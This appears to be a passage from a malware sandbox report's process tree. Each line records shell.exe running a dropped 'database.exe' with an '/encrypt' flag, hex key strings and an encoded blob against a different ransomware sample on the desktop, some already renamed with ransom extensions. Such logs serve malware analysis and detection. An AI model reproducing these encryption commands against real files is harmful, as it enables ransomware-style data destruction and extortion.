C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.gibz-eb53d5e2ac26d3f5bd2c4c0d58670a5171197e1e7cc797004612f8801da1aa68.exe"5⤵PID:8080
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.kpuo-bfd191300ad55cdd25269260b8f93e86307a609a02fe7e86ce012a516c2d4d73.exe"5⤵PID:8088
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldah-cd247bf7a6a9543730371927bd4773adc8124ccd6a4df96008ee0ecd66215a12.exe"5⤵PID:8096
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ldcq-c1da3cbf2c15cb64fb21ee704fedca797bf0f36ee2107015bb5625f0e8dd377b.exe.gif"5⤵PID:8104
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.liwq-a8c1bc0154b82490d3e19ebd3b4cfecb77aad4a5a05106255f69ded514be7ad7.exe.gif"5⤵PID:8108
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.ljvt-62dc5ca8c6a7156fdb097a3e8931aac0a0dd58add3329e70353977da6a39b972.exe.gif"5⤵PID:8120
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Blocker.llih-f1d92492f6be9432ed72244472c43037fce0c93f91dbeeab0e07f6b4c1b51fc5.exe.gif"5⤵PID:8016
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crusis.to-4dfb0748b865606fdfbcb046eab2514782b58877eb8bce148fa8085df69d3c21.exe"5⤵PID:8148
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Cryakl.aiv-0442cfabb3212644c4b894a7e4a7e84c00fd23489cc4f96490f9988e6074b6ab.exe.gif"5⤵PID:8160
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Crypmod.abtv-083e2fb3006532db506288506f079e4e11d3e9bdd256aeaf6d39ca562af8516b.exe"5⤵PID:8168
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.nxuo-0b9551cde23a77d6b60030077e00fc8b7d79ed02a5f7874463106f05d6ed97e9.exe.id-DA208E5B.[[email protected]].gamma"5⤵PID:8140
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Foreign.obdz-0218181bacdeb5047d897ed085343a74a0b8078fa4ccc08e12dd214bf724f6ac.exe.gif"5⤵PID:8144
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Matrix.rm-83c5e7c7dcae7b9561f703e0127c24387b9a6289649136916c64613cc6f52484.exe"5⤵PID:8184
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.PornoAsset.dfbq-29e0374a105fea9130acb3690ca69fc53e1c16cabae72013f84ba9781be9f27e.exe"5⤵PID:8188
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.cwv-5a6e73d2f815d35d09b0a936222091d860dcfa04ac7552df32da8abbc9fcc8d8.exe"5⤵PID:7172
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dbh-6030b908e988e188fe5d81d7547123cea10e174a4abaf951784d4aebf691aec6.exe"5⤵PID:5540
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dqq-cbdacafba9218a687bd0c8d3d92353b3bdea82cf1fe205c9637ac84dc03405d2.exe.gif"5⤵PID:6184
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.dzc-943316f7c794cf8f2bc8e3803654e6a389390eb1c90e88d02acd9bb76375cd3c.exe.gif"5⤵PID:4400
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe"5⤵PID:7180
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe"5⤵PID:4628
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe"5⤵PID:3084
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\00361\VHO-Trojan-Ransom.Win32.Blocker.gen-3e71c7978b347b083b97b0d14380576600507e2e9f7807ce6f7a8dafdad4bbe1.exe.gif"5⤵PID:7196
-
-
